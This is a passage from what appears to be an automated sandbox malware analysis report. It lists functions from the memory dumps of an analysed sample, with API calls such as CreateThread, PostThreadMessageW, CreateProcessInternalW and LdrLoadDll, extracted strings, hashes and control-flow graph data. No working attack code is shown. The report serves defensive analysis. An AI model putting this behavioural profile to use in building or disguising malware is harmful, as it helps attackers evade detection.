2e19fbc-2e19fc5 118->126 127 2e19ff6-2e1a008 119->127 128 2e1a00a 119->128 121->60 129 2e1a243-2e1a249 122->129 130 2e1a24f 122->130 123->116 133 2e1a0b3-2e1a0bf 124->133 125->109 126->125 127->119 128->58 129->130 130->115 134 2e1a0c1-2e1a0d3 133->134 135 2e1a0d5 133->135 134->133 135->56
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E196D5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID: ![$&$($1$67$9$:$:$;q$=q$A$A$BM$Be$C$E&$J$J$K.$N$O$Q$Q$Qz$R$V~$X$Y$Z$\$b$d$f$j$m`$u$uC$y9$0$^$l$}
                                                        • API String ID: 2422867632-1566399811
                                                        • Opcode ID: b44b7bc89731ce96443ab5f8618f6722dc515995a559009f0b43fe51199da31e
                                                        • Instruction ID: a09847c07f555689e330989b0414c8aeba3f6b0dee9a3c161b0a31bd0b249384
                                                        • Opcode Fuzzy Hash: b44b7bc89731ce96443ab5f8618f6722dc515995a559009f0b43fe51199da31e
                                                        • Instruction Fuzzy Hash: 8CC166B0945369DBEB618F41C958BDEBAB1BB05308F1081D9D15C3B281CBFA1A89CF95
                                                        Function 02E20DA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02E20E1D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: add80484a598dd52526d25cfb2fed4bfe38904d1accfc7ff773322919351b675
                                                        • Instruction ID: 6b455ca69ceebfb7b805c512f7b8886f0838b9c6efd2785ea6d7a0a986432a22
                                                        • Opcode Fuzzy Hash: add80484a598dd52526d25cfb2fed4bfe38904d1accfc7ff773322919351b675
                                                        • Instruction Fuzzy Hash: B001C431D8021876EB21A7908C02FDF7B7C9F41B50F04C055BA047B2C0D6B86606CBE5
                                                        Function 02E20D9F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 690 2e20d9f-2e20db0 691 2e20db9-2e20e0e call 2e3ac60 call 2e24770 call 2e11410 call 2e315d0 690->691 692 2e20db4 call 2e3a250 690->692 701 2e20e30-2e20e35 691->701 702 2e20e10-2e20e21 PostThreadMessageW 691->702 692->691 702->701 703 2e20e23-2e20e2d 702->703 703->701
                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02E20E1D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: 859bbb75967b6eb1d95fc84c509627164c9037ab0481433feb5e05c666f5a0a7
                                                        • Instruction ID: 6b455ca69ceebfb7b805c512f7b8886f0838b9c6efd2785ea6d7a0a986432a22
                                                        • Opcode Fuzzy Hash: 859bbb75967b6eb1d95fc84c509627164c9037ab0481433feb5e05c666f5a0a7
                                                        • Instruction Fuzzy Hash: B001C431D8021876EB21A7908C02FDF7B7C9F41B50F04C055BA047B2C0D6B86606CBE5
                                                        Function 02E20D86 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 718 2e20d86-2e20d8d 719 2e20dce-2e20dd1 718->719 720 2e20d8f-2e20d97 718->720 721 2e20dd7-2e20e0e call 2e11410 call 2e315d0 719->721 722 2e20dd2 call 2e24770 719->722 727 2e20e30-2e20e35 721->727 728 2e20e10-2e20e21 PostThreadMessageW 721->728 722->721 728->727 729 2e20e23-2e20e2d 728->729 729->727
                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02E20E1D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: ec01fe05991e302145302ed7ead0cf3122278e6f61c3d3bba40d3070605388aa
                                                        • Instruction ID: ee318f3b527dba5454044ee3122ddde277d017a8e66397859bb9e604047181fc
                                                        • Opcode Fuzzy Hash: ec01fe05991e302145302ed7ead0cf3122278e6f61c3d3bba40d3070605388aa
                                                        • Instruction Fuzzy Hash: 0101FE32A8226876DB1157959C02FFFBB78DF41B14F108197FA04AF280D67466158BD5
                                                        Function 02E20D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41threadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02E20E1D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                        • Instruction ID: a57e1bac0295a6f106c60703c043a60bd66752748e39ed8a931586f478dc242c
                                                        • Opcode Fuzzy Hash: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                        • Instruction Fuzzy Hash: FCF02476E8126876EB225B908C02FAF7B688F41B60F14C095FA007F2C1E6B4A5028BD5
                                                        Function 02E32EA0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 02E32F6B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        • Opcode ID: 0d8d0c8d6b3e62e8ab3d2cf77feb1b48f401ffe38d204fcf7f8acb982b3220f8
                                                        • Instruction ID: e7b8c927618ab11d9279274d2020dc19f7e1efb46a8a833bbe224ddf784649bf
                                                        • Opcode Fuzzy Hash: 0d8d0c8d6b3e62e8ab3d2cf77feb1b48f401ffe38d204fcf7f8acb982b3220f8
                                                        • Instruction Fuzzy Hash: B3319EB1641305BBD718DF64C884FE7BBA8AB48705F00862DBA59AB240D770BA40CBA0
                                                        Function 02E2EF26 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 02E2EF47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID: @J7<
                                                        • API String ID: 2538663250-2016760708
                                                        • Opcode ID: 7b00c411e6af0d7a88f787b213f0a7b71209d49bc76fa7b8b9e00b1bf606f269
                                                        • Instruction ID: 42761a14171b8f63c1899df4d638be25137fb4b6a8410dd691f296699a2f2a3a
                                                        • Opcode Fuzzy Hash: 7b00c411e6af0d7a88f787b213f0a7b71209d49bc76fa7b8b9e00b1bf606f269
                                                        • Instruction Fuzzy Hash: BD3152B5A002099FDB00DFD8D880DEFB7B9BF48304B148559E916AB354D771AE45CBA0
                                                        Function 02E2EF30 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 02E2EF47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID: @J7<
                                                        • API String ID: 2538663250-2016760708
                                                        • Opcode ID: 44e872770270470269c676d3ba4feb8682c40bf83486e244650d60c79dd493d9
                                                        • Instruction ID: 47f8f339a51587a0bccdf735a770eaa957829f7a4d90338a7344e4c713fe5d74
                                                        • Opcode Fuzzy Hash: 44e872770270470269c676d3ba4feb8682c40bf83486e244650d60c79dd493d9
                                                        • Instruction Fuzzy Hash: DF3121B5A006099FDB00DFD8D880DEFB7B9BF88304B148559E906A7314D775EE45CBA0
                                                        Function 02E2C2A8 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02E2C28F
                                                        • FindClose.KERNELBASE(?), ref: 02E2C29A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$CloseFileNext
                                                        • String ID:
                                                        • API String ID: 2066263336-0
                                                        • Opcode ID: c0055070deae22915e5ede0b486bd1d9294e1c65bd6a09feaad89b7eebcc2598
                                                        • Instruction ID: 26237387c7411fe7e0b70d4ea170a4df6b07bdd95a6fb223131e38cffbef142f
                                                        • Opcode Fuzzy Hash: c0055070deae22915e5ede0b486bd1d9294e1c65bd6a09feaad89b7eebcc2598
                                                        • Instruction Fuzzy Hash: 21D0C93678402D9A4B0089E5EC44AED7764FA94A66B2091AAE80AD6040EB31C50556D0
                                                        Function 02E24770 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E247E2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                        • Instruction ID: 0aa80e5a6326fdb811d7dda2e01fdaae502d5cf2201c15a4e7c3d3d6a9706206
                                                        • Opcode Fuzzy Hash: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                        • Instruction Fuzzy Hash: 48011EB9E4020DBBDB10DAE4DC45F9DB3B99B44309F0081A5E91A97281F671E758CB91
                                                        Function 02E386B0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02E28053,00000010,?,?,?,00000044,?,00000010,02E28053,?,?,?), ref: 02E38713
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: fe320d940116e532e60eba5034f8ffaffc46bd86db19e5629ddddabe4e23124c
                                                        • Instruction ID: e3c8af47994debcd909968ad19171662b3280ac471342d4cef67186839ded612
                                                        • Opcode Fuzzy Hash: fe320d940116e532e60eba5034f8ffaffc46bd86db19e5629ddddabe4e23124c
                                                        • Instruction Fuzzy Hash: 5901C4B2205108BBCB44DE99DC81EEB77ADAF8C754F508108BA09D7240D630F851CBA4
                                                        Function 02E19690 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E196D5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: b31c6847052ecd92f4524369f8bc20af02225ef8099cb7ae7682019b181a62e3
                                                        • Instruction ID: d8dcc7acd0d656871d4eb3283898756341fbe49be70f281ca6591f4ed653d790
                                                        • Opcode Fuzzy Hash: b31c6847052ecd92f4524369f8bc20af02225ef8099cb7ae7682019b181a62e3
                                                        • Instruction Fuzzy Hash: EDF06D333842043AE32076AA9C02FD7B38CDB80BB5F14402AF70DEB2C0D996B44187E8
                                                        Function 02E38620 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BF45589,00000007,00000000,00000004,00000000,02E24043,000000F4,?,?,?,?,?), ref: 02E3865C
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                        • Instruction ID: 21a646a6fe7a67975bc0e4e0e9281d9b47bc73a00894f8bdc9517e48ddbcefd4
                                                        • Opcode Fuzzy Hash: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                        • Instruction Fuzzy Hash: 7BE032B62442047BD610EA59DC45EEB33ADEBC8710F008419FA09A7241C661B811CAB4
                                                        Function 02E385D0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(02E219B9,?,02E34DCB,02E219B9,02E349C7,02E34DCB,?,02E219B9,02E349C7,00001000,?,?,02E39EA0), ref: 02E3860C
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                        • Instruction ID: 6df91eaa2badd3e55b576bd01daedf7fcdfff50b6c05c6acbdca3c7e4c1fff18
                                                        • Opcode Fuzzy Hash: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                        • Instruction Fuzzy Hash: 14E06DB12042047BD610EE49EC41EDB37ADEFC9710F008018F909A7281D670B910CBB5
                                                        Function 02E28090 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02E280BC
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 41e75460d2c76cdf25b9bf2df3f084cf74ce42965de9562ae070f3b99972df46
                                                        • Instruction ID: f6807fa02f40c8fcd7596d761e80ee3276f3efcbf66d171eace30c75c4a5abd7
                                                        • Opcode Fuzzy Hash: 41e75460d2c76cdf25b9bf2df3f084cf74ce42965de9562ae070f3b99972df46
                                                        • Instruction Fuzzy Hash: 26E0263228020427FB24AEB8DC45F6233489B4872CF089B60B81DCF2C1EAB9F50182A0
                                                        Function 02E27EA0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02E21CA0,02E370E7,02E349C7,?), ref: 02E27ED3
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 6e269ccc2046a89e5352fbc42c4229eefa4882b668fd737a69486c942e2259ec
                                                        • Instruction ID: 2c50824d4f2507a8e5831d51e550a4afbe08e4798906a23c721f8ce216eea7b9
                                                        • Opcode Fuzzy Hash: 6e269ccc2046a89e5352fbc42c4229eefa4882b668fd737a69486c942e2259ec
                                                        • Instruction Fuzzy Hash: A3D05E726842043BF640A6F58C06F57328D4B50764F45D068BA0DEF2C2ED55F5108AA5
                                                        Function 03602C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 39ec720151e5e534a50b71c47ea2908375e8d675c5286808d186e27aab9686a8
                                                        • Instruction ID: 8d12c77fd42fe64845c1fb7f98f2d8dc3051a38b0a85b8319be1a42cb663939e
                                                        • Opcode Fuzzy Hash: 39ec720151e5e534a50b71c47ea2908375e8d675c5286808d186e27aab9686a8
                                                        • Instruction Fuzzy Hash: 1EB09B719415C5C6DA55E760470D71779046BD2701F1DC465D2030795F4779C1D1E175

                                                        Non-executed Functions

                                                        Function 034E053F Relevance: .1, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571809691.00000000034E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_34e0000_compact.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aac5dcc0867217ba4aba7e9cd7e431ab872d74c33f9427044c7fa6ef03974de3
                                                        • Instruction ID: 6575370b383f181a080b9f0015cc4ccd37d9bc9633ad71eaae78292dddd6eccc
                                                        • Opcode Fuzzy Hash: aac5dcc0867217ba4aba7e9cd7e431ab872d74c33f9427044c7fa6ef03974de3
                                                        • Instruction Fuzzy Hash: 2B41287551DB0D4FD368EF6A908167BF3E1FB85301F54052ED8AACB352E6B0D8428789
                                                        Function 034EB743 Relevance: 56.5, Strings: 45, Instructions: 212COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571809691.00000000034E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_34e0000_compact.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                        • API String ID: 0-3558027158
                                                        • Opcode ID: acaf5d12afa628f009e63383bb23d224d841069a9dc0630c6d547ed248772fab
                                                        • Instruction ID: 19c08d5c03f54e8a6f22989a9bbf4ca92572a2e6624031b84600352ee3fd73c4
                                                        • Opcode Fuzzy Hash: acaf5d12afa628f009e63383bb23d224d841069a9dc0630c6d547ed248772fab
                                                        • Instruction Fuzzy Hash: 329140F04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                        Function 03602890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 03a725f949567ef86ef80fe6fc59425e684e5d589603e49e4fbfccf42f04b79d
                                                        • Instruction ID: 2cc3dac0c20d41f6dea21dcbc74a0ae134d22f6593c89802ec8d47333f8f4fd4
                                                        • Opcode Fuzzy Hash: 03a725f949567ef86ef80fe6fc59425e684e5d589603e49e4fbfccf42f04b79d
                                                        • Instruction Fuzzy Hash: B45137BAA00116BFCF14DBA8C9D497FF7B8BF092007188669E4A5D7381D330DE548BA0
                                                        Function 03672410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 0b9b57ad2b2427b4d91b972a2cf022ad6ca078e2fe27d68d7c4d7603d018c8aa
                                                        • Instruction ID: b4451ce2aefd2f1dbb5d5a7ee722a19a5eca08c4ae71910754199f85ab24b516
                                                        • Opcode Fuzzy Hash: 0b9b57ad2b2427b4d91b972a2cf022ad6ca078e2fe27d68d7c4d7603d018c8aa
                                                        • Instruction Fuzzy Hash: 5B5124B5A00645AFDF30DF9CC9A087FB7FDEB44240B88886AF496D7645E774EA408760
                                                        Function 035F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • ExecuteOptions, xrefs: 036346A0
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03634655
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03634725
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 03634787
                                                        • Execute=1, xrefs: 03634713
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036346FC
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03634742
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: b0e933d038885a5a1ba59585a79921124c91c64626f5d964c331fd5396fb3c56
                                                        • Instruction ID: 4dddc77a9338f608bbf87fdbe69522c517b0193cef759d67b11cf03c65bd6fa7
                                                        • Opcode Fuzzy Hash: b0e933d038885a5a1ba59585a79921124c91c64626f5d964c331fd5396fb3c56
                                                        • Instruction Fuzzy Hash: 53510A35A003196EDB11EBA5FC45FAEB7B8FF0D340F040099D605AB1E1EB709A418F94
                                                        Function 0360B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                        • Instruction ID: 7a223bfa17687f88ad5666ea48667773d45c96b17d68d783e8e8e756d68bbcaf
                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
